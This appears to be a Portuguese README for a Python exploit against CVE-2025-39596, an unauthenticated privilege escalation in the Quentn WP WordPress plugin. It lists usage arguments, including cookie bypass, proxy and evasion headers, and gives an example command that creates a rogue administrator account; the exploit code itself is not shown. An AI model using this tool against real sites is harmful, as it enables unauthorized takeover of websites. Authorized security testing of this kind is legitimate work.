
Quentn WP <= 1.2.8 - Escalação de Privilégio Não Autenticada
Quentn WP <= 1.2.8 - Escalação de Privilégios não Autenticada
O plugin Quentn WP para WordPress é vulnerável a Escalação de Privilégios em todas as versões até, e incluindo, 1.2.8. Isso permite que atacantes não autenticados escalem seus privilégios para o nível de administrador.
CVE-2025-395969.8 (Crítico)Este repositório contém um exploit em Python para o CVE-2025-39596, permitindo a criação de um novo usuário administrador do WordPress sem autenticação usando uma requisição de API manipulada.
Funcionalidades:
python3 CVE-2025-39596.py -u <target_url> -e <email> [options]
Argumentos Obrigatórios:
-u, --url URL do site WordPress alvo (ex.: http://127.0.0.1/wordpress)-e, --email Email para a nova conta de administradorArgumentos Opcionais:
-f, --fname Primeiro nome (padrão: Pwn)-l, --lname Último nome (padrão: Admin)-r, --role Função a atribuir (padrão: administrator)-k, --key Chave da API Quentn, se conhecida--cookie Cookie para bypass autenticado, se disponível--proxy Suporte a proxy (ex.: http://127.0.0.1:8080)--skip-ssl Ignorar verificação SSL--extra Ativar cabeçalhos extras de evasãoExemplo:
python3 CVE-2025-39596.py -u http://target.com/wordpress -e [email protected] --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
Exploit Success By | NxploitedEsta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.
Qualquer uso indevido é estritamente proibido.
O autor não é responsável por qualquer dano ou uso indevido causado por este código.
Por: Nxploited ( Khaled Alenazi )